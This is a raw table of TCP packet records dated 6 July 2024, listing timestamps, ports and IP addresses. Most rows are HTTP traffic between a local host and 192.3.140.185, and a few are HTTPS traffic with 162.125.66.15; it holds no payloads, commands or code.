Jul 6, 2024 13:27:24.700429916 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.700459957 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.700469971 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.700493097 CEST	49762	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.705771923 CEST	80	49762	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.897566080 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.902570009 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:24.902626038 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.902744055 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:24.907493114 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.116141081 CEST	443	49761	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:25.116205931 CEST	443	49761	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:25.116245985 CEST	49761	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:25.116944075 CEST	49761	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:25.124463081 CEST	443	49763	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:25.182842970 CEST	49763	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:25.182854891 CEST	443	49763	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:25.250072002 CEST	49765	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:25.250102043 CEST	443	49765	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:25.250164986 CEST	49765	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:25.252137899 CEST	49765	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:25.252150059 CEST	443	49765	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:25.497742891 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.497760057 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.497771025 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.497788906 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.497798920 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.497808933 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.497823000 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.497843027 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.497876883 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.497931957 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.497942924 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.497967958 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.497991085 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.498028040 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.502677917 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.502734900 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.502746105 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.502783060 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.502799988 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.502844095 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.588438988 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.588464975 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.588476896 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.588510990 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.588536978 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.588547945 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.588567972 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.588866949 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.588902950 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.588927031 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.588937044 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.588958979 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.588968992 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.589452982 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.589472055 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.589504004 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.589529991 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.589545965 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.589561939 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.589620113 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.589658022 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.590274096 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.590306044 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.590317011 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.590342999 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.590418100 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.590429068 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.590461016 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.591126919 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.591166973 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.591190100 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.591201067 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.591231108 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.591248989 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.591273069 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.591372013 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.593523026 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.674339056 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.679564953 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.679584026 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.679595947 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.679653883 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.679747105 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.679757118 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.679768085 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.679780006 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.679794073 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.679822922 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.679929972 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.679958105 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.679969072 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.679979086 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.680054903 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.680119038 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.680130959 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.680146933 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.680160999 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.680169106 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.680217981 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.680830956 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.680846930 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.680857897 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.680890083 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.680958986 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.680969954 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.680983067 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.680990934 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.681000948 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.681020975 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.681679964 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.681689024 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.681699991 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.681730032 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.681757927 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.681864023 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.681874990 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.681885958 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.681899071 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.681909084 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.681938887 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.684043884 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.684057951 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.684068918 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.684102058 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.684108973 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.684119940 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.684132099 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.684144020 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.684150934 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.684169054 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.684405088 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.684454918 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.684464931 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.684488058 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.684499979 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.684536934 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.684564114 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.684576035 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.684586048 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.684602022 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.684636116 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.684786081 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.684796095 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.684804916 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.684823990 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.684830904 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.684843063 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.684854031 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.684863091 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.684871912 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.684889078 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.694700003 CEST	443	49763	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:25.694765091 CEST	443	49763	162.125.66.15	192.168.2.4
Jul 6, 2024 13:27:25.694928885 CEST	49763	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:25.695286989 CEST	49763	443	192.168.2.4	162.125.66.15
Jul 6, 2024 13:27:25.770724058 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.770739079 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.770750999 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.770762920 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.770773888 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.770800114 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.770838976 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.770848989 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.770860910 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.770869970 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.770881891 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.770893097 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.770901918 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.770915031 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.770942926 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.770989895 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.771002054 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.771023989 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.771612883 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.771625042 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.771635056 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.771647930 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.771660089 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.771672010 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.771689892 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.771698952 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.771708965 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.771719933 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.771727085 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.771739960 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.771752119 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.771759033 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.771775007 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.771779060 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.771797895 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.771809101 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.771817923 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.771827936 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.771840096 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.771852970 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.771862030 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.771881104 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.771931887 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.771941900 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.771960974 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.771969080 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.771979094 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.771990061 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.771998882 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.772008896 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.772027969 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.772202969 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.772259951 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.772620916 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.772717953 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.772728920 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.772764921 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.772777081 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.772788048 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.772799015 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.772809029 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.772833109 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.772958040 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.773736000 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.773787975 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.773797989 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.773818970 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.773842096 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.773904085 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.773914099 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.773925066 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.773937941 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.773947954 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.773972988 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.774235964 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.774255037 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.774267912 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.774277925 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.774288893 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.774298906 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.774308920 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.774327040 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.774346113 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.774394989 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.774405956 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.774415970 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.774426937 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.774436951 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.774446964 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.774462938 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.774468899 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.774482012 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.774492979 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.774641037 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.774652958 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.774662971 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.774681091 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.774691105 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.774703979 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.774710894 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.774722099 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.774739981 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.775018930 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.775054932 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.775084019 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.775094032 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.775124073 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.775204897 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.775216103 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.775224924 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.775238037 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.775245905 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.775279045 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.775311947 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.775443077 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.775454044 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.775465012 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.775475979 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.775486946 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.775496960 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.775513887 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.775532961 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.861267090 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.861332893 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.861387014 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.861418962 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.861494064 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.861546993 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.861567974 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.861582994 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.861599922 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.861608028 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.861624956 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.861638069 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.861646891 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.861673117 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.861686945 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.861701012 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.861709118 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.861726999 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.861736059 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.861749887 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.861769915 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.861780882 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.861790895 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.861800909 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.861808062 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.861820936 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.861829042 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.861907005 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.861917019 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.861926079 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.861948013 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.861965895 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.862359047 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.862400055 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.862411022 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.862433910 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.862550020 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.862560034 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.862571001 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.862581968 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.862592936 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.862607956 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.862699986 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.862719059 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.862745047 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.862802982 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.862814903 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.862824917 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.862840891 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.862847090 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.862867117 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.863328934 CEST	80	49764	192.3.140.185	192.168.2.4
Jul 6, 2024 13:27:25.863368988 CEST	49764	80	192.168.2.4	192.3.140.185
Jul 6, 2024 13:27:25.863389015 CEST	80	49764	192.3.140.185	192.168.2.4
